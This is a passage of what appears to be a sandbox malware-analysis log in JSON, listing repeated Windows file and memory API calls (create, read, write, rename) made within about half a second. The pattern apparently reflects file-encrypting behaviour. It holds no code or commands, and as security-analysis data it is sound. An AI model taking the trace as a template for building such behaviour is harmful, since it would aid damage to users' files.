"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,731", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,731", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,731", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,731", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,731", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,741", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,751", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,751", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,751", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,751", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,761", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,761", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,761", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,761", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,761", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,761", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,771", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,771", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,771", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,771", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,771", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,771", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,771", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,771", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,771", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,781", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,791", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,791", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,791", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,791", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,791", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,791", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,791", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,801", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,801", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,801", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,801", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,801", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,801", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,801", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,801", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,811", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,811", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,811", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,811", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,811", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,811", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,811", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,811", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,811", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,821", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,831", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,831", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,831", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,831", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,831", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,831", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,831", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,831", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,831", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,831", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,831", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,841", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,841", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,841", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,841", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,841", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,841", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,841", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,851", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,851", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,861", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,861", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,861", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,861", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,861", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,871", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,871", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,871", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,871", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,871", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,871", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,871", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,871", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,871", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,871", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,881", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,881", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,881", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,881", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,881", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,881", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,891", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,891", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,891", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,891", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,891", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,891", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,891", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,891", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,891", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,891", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,891", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,901", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,901", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,901", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,901", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,901", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,901", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,901", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,901", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,911", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,911", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,911", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,911", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,911", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,911", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,921", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,921", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,921", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,921", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,921", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,921", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,921", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,921", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,931", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,941", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,941", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,951", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,951", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,951", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,951", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,951", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,951", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,951", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,961", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,961", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,961", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,961", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,961", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,961", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,961", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,961", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,971", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,971", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,971", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,971", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,971", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,971", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,981", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,981", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,981", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,981", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,981", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,981", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,981", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,981", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,991", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,991", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,991", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,991", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,991", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,991", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,991", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,991", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,001", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,001", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,001", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,001", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,001", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,001", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,001", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,001", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,061", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,061", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,061", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,061", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,061", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,061", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,061", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,061", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,071", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,071", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,071", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,071", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,071", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,071", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,071", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,071", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,081", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,081", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,081", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,081", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,081", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,081", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,081", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,081", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,091", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,091", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,091", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,091", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,091", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,091", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,091", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,091", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,091", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,091", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,101", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,101", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,101", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,101", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,101", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,101", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,101", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,101", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,111", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,111", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,111", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,111", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,111", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,111", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,111", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,111", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,121", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,121", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,121", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,121", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,121", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,121", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,121", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,121", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,121", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,131", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,131", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,131", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,131", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,131", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,131", "api": "NtReadFile"}, 